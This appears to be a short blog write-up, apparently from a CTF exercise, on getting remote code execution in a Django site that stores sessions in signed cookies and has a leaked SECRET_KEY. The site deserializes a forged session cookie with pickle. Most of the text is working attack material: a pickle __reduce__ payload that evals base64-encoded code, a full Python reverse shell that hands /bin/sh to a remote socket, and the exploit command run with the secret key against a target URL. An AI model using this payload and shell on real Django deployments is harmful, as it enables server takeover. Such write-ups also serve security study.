- The session engine is "django.contrib.sessions.backends.signed_cookies"
- The SECRET_KEY is also provided in source code.
When signed_cookies is used, every cookie with sessionid field will treated as serialized data. Then pickle is used to deserialize. While pickle library is unsafe once it is not apply to ordinary type. So we can follow the document here and complete the attack process. Note that reference document also provide reference code which is wealthy to read.
With following python code, we can convert connback.py into pickle format and invoke the program once pickle.loads() is called to de-serialize.
And we can prepare a reverse shell as follow
Finally, we start a nc for reverse shell to connect and excute exploit.py to retrieve return shell.
code = b64(open('connback.py').read())
class ex(object):
def __reduce__(self):
return ( eval, ('str(eval(compile("%s".decode("base64"),"q","exec"))).strip("None")'%(code),) )
payload = pickle.dumps(ex())
And we can prepare a reverse shell as follow
socket.setdefaulttimeout(60)
sok = None
try:
sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sok.connect((host,port))
sok.send('!P0Wn! Congratulation !!\n')
save = [ os.dup(i) for i in range(0,3) ]
os.dup2(sok.fileno(),0)
os.dup2(sok.fileno(),1)
os.dup2(sok.fileno(),2)
shell = subprocess.call(["/bin/sh","-i"])
[ os.dup2(save[i],i) for i in range(0,3)]
[ os.close(save[i]) for i in range(0,3)]
os.close(sok.fileno())
except Exception:
pass
Finally, we start a nc for reverse shell to connect and excute exploit.py to retrieve return shell.
bletchley@Viking:~/WorkSpace/2013_Django/pwp-master$ python exploit.py '1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk' http://vuln-django.orange.tw Sending payload, check you listenner
沒有留言:
張貼留言